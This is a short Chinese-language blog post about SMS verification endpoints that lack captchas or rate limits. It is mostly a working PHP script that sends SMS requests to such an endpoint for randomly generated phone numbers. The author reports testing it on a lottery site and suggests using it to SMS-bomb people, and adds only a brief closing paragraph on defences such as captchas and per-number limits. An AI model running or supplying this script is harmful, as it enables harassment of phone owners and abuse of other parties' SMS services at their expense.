目前很多小网站的短信发送接口还比较low,既没有图形验证码,短信验证又比较短,很轻易就被脚本攻击,多次访问接口发送短信,然后暴力破解验证码。之前的抽奖接口就被匿名人士访问了上亿次。这里很简单就可以做一个暴力接口短信访问脚本:
<?php $url = "http://XXXXXXXXXXXXXXXXXXXX";//有短信请求的API for($i = 0; $i < 4; $i ++) { $mobile = "1371". mt_rand(0000000, 9999999); $post = array("mobile" => $mobile); $res = query($url, array(), $post); $res = json_decode($res, true); $msg = iconv('UTF-8', 'GB2312', $res["message"]); echo $mobile; echo "\n\t"; echo $msg; } function query($url, $get=array(), $post = array()) { $urlPrefix = $url; $query = http_build_query($get); $url = $urlPrefix.(strpos($urlPrefix, "?") ? "&" : "?") . $query; $opt = array( CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_HEADER => FALSE, CURLOPT_FOLLOWLOCATION => FALSE, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => TRUE, CURLOPT_CONNECTTIMEOUT => 1, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => FALSE, CURLOPT_VERBOSE => FALSE, ); $ch = curl_init(); curl_setopt_array($ch, $opt); curl_setopt($ch, CURLOPT_URL, $url); if($post) { $post = http_build_query($post); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } $raw = curl_exec($ch); $errno = curl_errno($ch); if ($errno == CURLE_COULDNT_CONNECT) { echo "connect wrong {$url}"; die(); } return $raw; }
本人随便测试了个彩票网站接口,竟然可以连续发短信,我想可以利用这个对某些人进行短信轰炸了!
一般注册网页均采用https的安全连接,发短信前有图形验证码,同一号码不能请求多次等情况,很多方式可以避免,在设计注册和登录上要特别注意。